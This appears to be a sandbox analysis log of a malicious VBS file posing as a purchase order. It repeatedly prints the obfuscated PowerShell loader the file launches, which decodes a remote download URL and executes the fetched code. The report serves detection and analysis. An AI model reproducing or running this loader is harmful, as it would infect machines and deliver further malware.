Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki 
';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFor
Source: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs | Initial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exe | Process created: Commandline size = 7558
Source: amsi64_432.amsi.csv, type: OTHER | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 432, type: MEMORYSTR | Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engine | Classification label: mal100.expl.evad.winVBS@4/5@2/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Roaming\Benzinforhandlers.xan
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5388:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ov434nxa.hxo.ps1
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs"
Source: C:\Windows\System32\wscript.exe | File read: C:\Users\user\Desktop\desktop.ini
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: BOLUDA CORPORACI#U00d3N MAR#U00cdTIMA, S.L. PEDIDO 268e44.vbs | ReversingLabs: Detection: 31%
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki 
';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFor
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: edputil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.staterepositoryps.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: appresolver.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: bcp47langs.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: slc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: sppc.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\wscript.exe | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb= | source: powershell.exe, 00000002.00000002.1679719190.000001E9B2511000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb | source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdb | source: powershell.exe, 00000002.00000002.1679719190.000001E9B24BF000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb | source: powershell.exe, 00000002.00000002.1679517302.000001E9B2498000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: mscorlib.pdbCLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 | source: powershell.exe, 00000002.00000002.1679719190.000001E9B24E1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: pdblib.pdbXt | source: powershell.exe, 00000002.00000002.1646651748.000001E9983A1000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: em.Core.pdbP | source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb1 | source: powershell.exe, 00000002.00000002.1678372336.000001E9B21D8000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: CallSite.Targetore.pdb | source: powershell.exe, 00000002.00000002.1679719190.000001E9B2511000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\symbols\dll\mscorlib.pdb#e | source: powershell.exe, 00000002.00000002.1679517302.000001E9B2498000.00000004.00000020.00020000.00000000.sdmp

      Data Obfuscation

Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: .Run("POWERSHELL " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overforto", "0")
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Anti Malware Scan Interface: <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki ';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin 
';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFortrGVaagneDekstrOsteo] Sulf:Pound:Psychs GangE FaseCKulleuGruo.rdesmoiNrlsttaand,YF.reaP Suger UnenOUdkldTRu udoKompoc.r
Source: C:\Windows\System32\wscript.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Licence Skafotternes Brdlses Brnetestamente #>;$Cabrera='Glassenes';<#Jotting Slubbering Overfortolkningers Farvefjernsynene #>;$Bevaringsforanstaltning=$Uudgrundelig+$host.UI; function Osmate11($Samlets80){If ($Bevaringsforanstaltning) {$Unsavoredness++;}$Forblst=$Baktericide+$Samlets80.'Length'-$Unsavoredness; for( $Udstykningsomraadets=5;$Udstykningsomraadets -lt $Forblst;$Udstykningsomraadets+=6){$Skomagerdrengenes=$Udstykningsomraadets;$Daschagga+=$Samlets80[$Udstykningsomraadets];$Maurers='Dictyoceratine';}$Daschagga;}function Semicalcareous($Passionlessness){ . ($Duplicidentata) ($Passionlessness);}$fremstillingsevnen=Osmate11 'HakkeMUdsproStortz GalliUnclel Un elBenenaVrigh/Vasom ';$fremstillingsevnen+=Osmate11 'Rhi o5Anlgs. Habi0Sblad Lyrik( eetW,ndesiF ldlnNoterdOpsejoJehovwm,ness d bg CyrtoN ProvTUnwra T oto1sphen0Exter.Lymph0Hvine; Unaf AandeWBor.eiFor un edbu6Fllet4 esul;Nonsy Adipox Viln6F rma4Freja;Relie InterA trivIkld.: Ribe1Bffel3T.ran1Kobra.L.mai0 Mar )Ulvef Di opG.ncaneHoeincUnderkS,idso step/Bjerg2Huma 0 ilox1Forsi0Anhng0Un,am1 Gab.0Afdel1Fikt AnticFS.aabimadolrSysteeTaihofAmb yoTrestx unap/Nomar1T ppe3Minis1Kamos.me,er0Rean ';$Lingvisternes=Osmate11 'DukseU .oncSa.oeteUdlevrForli-Go daA linjGPr vlESepa.NMotorTTegng ';$Fordrvende=Osmate11 'Vask hCi.dat ventDiblap vandsDepla: Pres/ hets/foreodSaprorMa itiNo mavByggeem ste.SlatigHusgeoSibneo Reklg SatslNonfue strm.C.fffcbrouioCh,vamErsta/Pe.iouHidroc uffi?Faulte paraxAxonopGerero A.rarF rsktAnnas=Reg edSeedioViolawProgrn,turklsti lo BulmatilkbdLacor&Vap.riAnoind Gash=Tymba1GanglTDeleseKnudrJOldfrPLovtel ResntPantiNJongltepaulbOpal J sh,eE,fterIcompouMasseRErhveN VersZPo.no9GeratmBrnde2AfbetaAnnebUForl p BorgCThuriSNazir0 Te.elBlemoWindtjzFootbqSwimm0C ronD MystyEnter ';$sortsmusket=Osmate11 ',carp>Ligki 
';$Duplicidentata=Osmate11 ' LeveiFattieVa thXKabin ';$Nasalises='Filamenterne';$Friktionskoefficienterne='\Benzinforhandlers.xan';Semicalcareous (Osmate11 ' T.pe$SlutngTrkulLBest,O GradbKra fAUnheaLcentr:Dis,uf UnhorBelfasoutnut Une.EGla ih ivena Re tainhibNHoarsdDiskesJ urnvSangeI,ysseDrhamnEAfskrnEffem9Orium3Circu=A.sac$FdseleOutwoN ebrV eten:C.ffea ubtrpRadioPBredbd Glyca IsocT ,lodaAng.e+ S,bs$PatenfchemorMiscoiJeeptKArbejtDis,riNonseoSynkrnOvermsSgnomKTrmanO SubvE,ibroFVedhnFReco ILinkbCbran.iIndehESuspeNTadestDomm,E kor rklammNData eHofna ');Semicalcareous (Osmate11 'gudma$ MulkGekstrLTrigooDuernbRasteAPseudLBetnk:ApostfBalstLBlandyTroj vMejeseD ivarL njeSTimonJSteenUDevi sErosisDiscuePeakbrDesp =Lib l$SammefEksamo .ennRHorrodFor erCyclovRadi,eFodbanA scidPredeEUlnne.SjklhSKallipHo lelBygrnI Ealdt kara(Nonab$ UnresU derOSpul,r TyvstTi,deSLaureM,onvouGemy.sHulebkMinveeT adit Mere)Alleg ');Semicalcareous (Osmate11 'Pleu,[Jor,fNTipssE Sk ltBrutt.CoiffS CancE E ecRHalvpVBidariF lmacbrutie uercpOvertOStinki nedln F rlTMegacMNe bjAS cioNKartoAFor
      Source: C:\Windows\System32\wscript.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\wscript.exe | Window found: window name: WSH-Timer
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 4130
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 5765
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7092 | Thread sleep time: -1844674407370954s >= -30000s
      Source: wscript.exe, 00000000.00000002.1484575349.000001400BC6A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\p
      Source: powershell.exe, 00000002.00000002.1679010895.000001E9B222B000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information queried: ProcessInformation

      HIPS / PFW / Operating System Protection Evasion

      Source: Yara match | File source: amsi64_432.amsi.csv, type: OTHER
      Source: Yara match | File source: Process Memory Space: powershell.exe PID: 432, type: MEMORYSTR
      Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "c:\windows\system32\windowspowershell\v1.0\powershell.exe" " <#licence skafotternes brdlses brnetestamente #>;$cabrera='glassenes';<#jotting slubbering overfortolkningers farvefjernsynene #>;$bevaringsforanstaltning=$uudgrundelig+$host.ui; function osmate11($samlets80){if ($bevaringsforanstaltning) {$unsavoredness++;}$forblst=$baktericide+$samlets80.'length'-$unsavoredness; for( $udstykningsomraadets=5;$udstykningsomraadets -lt $forblst;$udstykningsomraadets+=6){$skomagerdrengenes=$udstykningsomraadets;$daschagga+=$samlets80[$udstykningsomraadets];$maurers='dictyoceratine';}$daschagga;}function semicalcareous($passionlessness){ . ($duplicidentata) ($passionlessness);}$fremstillingsevnen=osmate11 'hakkemudsprostortz galliunclel un elbenenavrigh/vasom ';$fremstillingsevnen+=osmate11 'rhi o5anlgs. habi0sblad lyrik( eetw,ndesif ldlnnoterdopsejojehovwm,ness d bg cyrton provtunwra t oto1sphen0exter.lymph0hvine; unaf aandewbor.eifor un edbu6fllet4 esul;nonsy adipox viln6f rma4freja;relie intera trivikld.: ribe1bffel3t.ran1kobra.l.mai0 mar )ulvef di opg.ncanehoeincunderks,idso step/bjerg2huma 0 ilox1forsi0anhng0un,am1 gab.0afdel1fikt anticfs.aabimadolrsysteetaihofamb yotrestx unap/nomar1t ppe3minis1kamos.me,er0rean ';$lingvisternes=osmate11 'dukseu .oncsa.oeteudlevrforli-go daa linjgpr vlesepa.nmotorttegng 